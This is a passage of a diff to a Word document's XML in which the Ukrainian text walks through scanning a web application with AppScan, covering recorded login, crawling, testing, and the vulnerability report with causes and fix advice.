-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t xml:space="preserve">В результаті виконаних дій </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>AppScan</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>збереже алгоритм авторизації у вигляді запитів до сервера, які треба виконати. Виконання входу до облікового запису допоможе відшукати більше вразливостей в додатку.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>Після цих дій почнеться сканування веб-додатку, яке відбувається в декілька етапів:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>-індексація посилань</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>( створення дерева веб-додатку)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>-аналіз, що полягає в підготовці об</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>’</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>єктів та створенні тестів</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>-тестування, де виконується збір інформації, виконання тестів та очистка тимчасових даних.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="194C2DA8" wp14:editId="1A8041D4">
-            <wp:extent cx="5940425" cy="2813563"/>
-            <wp:effectExtent l="0" t="0" r="3175" b="6350"/>
-            <wp:docPr id="11" name="Рисунок 11"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -27472,7 +29602,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5940425" cy="2813563"/>
+                      <a:ext cx="5940425" cy="3586082"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -27494,7 +29624,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -27506,7 +29636,39 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>Після завершення тестування програма видає список знайдених вразливостей відсортованих по серйозності:</w:t>
+        <w:t xml:space="preserve">В результаті виконаних дій </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AppScan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>збереже алгоритм авторизації у вигляді запитів до сервера, які треба виконати. Виконання входу до облікового запису допоможе відшукати більше вразливостей в додатку.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27518,6 +29680,146 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>Після цих дій почнеться сканування веб-додатку, яке відбувається в декілька етапів:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>-індексація посилань</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>( створення дерева веб-додатку)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>-аналіз, що полягає в підготовці об</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>єктів та створенні тестів</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>-тестування, де виконується збір інформації, виконання тестів та очистка тимчасових даних.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
@@ -27526,11 +29828,12 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="456A138B" wp14:editId="117C97D0">
-            <wp:extent cx="5940425" cy="3594052"/>
-            <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
-            <wp:docPr id="13" name="Рисунок 13"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="194C2DA8" wp14:editId="1A8041D4">
+            <wp:extent cx="5940425" cy="2813563"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="6350"/>
+            <wp:docPr id="11" name="Рисунок 11"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -27550,7 +29853,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5940425" cy="3594052"/>
+                      <a:ext cx="5940425" cy="2813563"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -27584,9 +29887,12 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>Для кожної знайденої вразливості можна подивитись детальну інформацію</w:t>
-      </w:r>
-      <w:r>
+        <w:t>Після завершення тестування програма видає список знайдених вразливостей відсортованих по серйозності:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="2A2A2A"/>
@@ -27595,43 +29901,17 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve"> про те, як було модифіковано запит і яку відповідь в результаті було отримано</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73D8B1A5" wp14:editId="5B23F1CA">
-            <wp:extent cx="4203190" cy="6020230"/>
-            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
-            <wp:docPr id="14" name="Рисунок 14"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="456A138B" wp14:editId="117C97D0">
+            <wp:extent cx="5940425" cy="3594052"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
+            <wp:docPr id="13" name="Рисунок 13"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -27651,7 +29931,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4204123" cy="6021567"/>
+                      <a:ext cx="5940425" cy="3594052"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -27678,15 +29958,61 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>Для кожної знайденої вразливості можна подивитись детальну інформацію</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> про те, як було модифіковано запит і яку відповідь в результаті було отримано</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CFFAD20" wp14:editId="47A156D4">
-            <wp:extent cx="5332780" cy="4331061"/>
-            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
-            <wp:docPr id="15" name="Рисунок 15"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73D8B1A5" wp14:editId="5B23F1CA">
+            <wp:extent cx="4203190" cy="6020230"/>
+            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
+            <wp:docPr id="14" name="Рисунок 14"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -27706,7 +30032,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5338300" cy="4335544"/>
+                      <a:ext cx="4204123" cy="6021567"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -27733,49 +30059,15 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Коментарі з можливими причинами виникнення </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>дефекту:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="138CD152" wp14:editId="1C46E326">
-            <wp:extent cx="3467404" cy="4170260"/>
-            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
-            <wp:docPr id="16" name="Рисунок 16"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CFFAD20" wp14:editId="47A156D4">
+            <wp:extent cx="5332780" cy="4331061"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+            <wp:docPr id="15" name="Рисунок 15"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -27795,7 +30087,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3470856" cy="4174411"/>
+                      <a:ext cx="5338300" cy="4335544"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -27829,8 +30121,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Та поради щодо способів виправлення вихідного код</w:t>
+        <w:t xml:space="preserve">Коментарі з можливими причинами виникнення </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -27841,7 +30132,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>у з метою виправити вразливість:</w:t>
+        <w:t>дефекту:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27862,10 +30153,10 @@
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E69E524" wp14:editId="647F1360">
-            <wp:extent cx="5940425" cy="7144573"/>
-            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
-            <wp:docPr id="17" name="Рисунок 17"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="138CD152" wp14:editId="1C46E326">
+            <wp:extent cx="3467404" cy="4170260"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="16" name="Рисунок 16"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -27885,6 +30176,96 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="3470856" cy="4174411"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Та поради щодо способів виправлення вихідного код</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
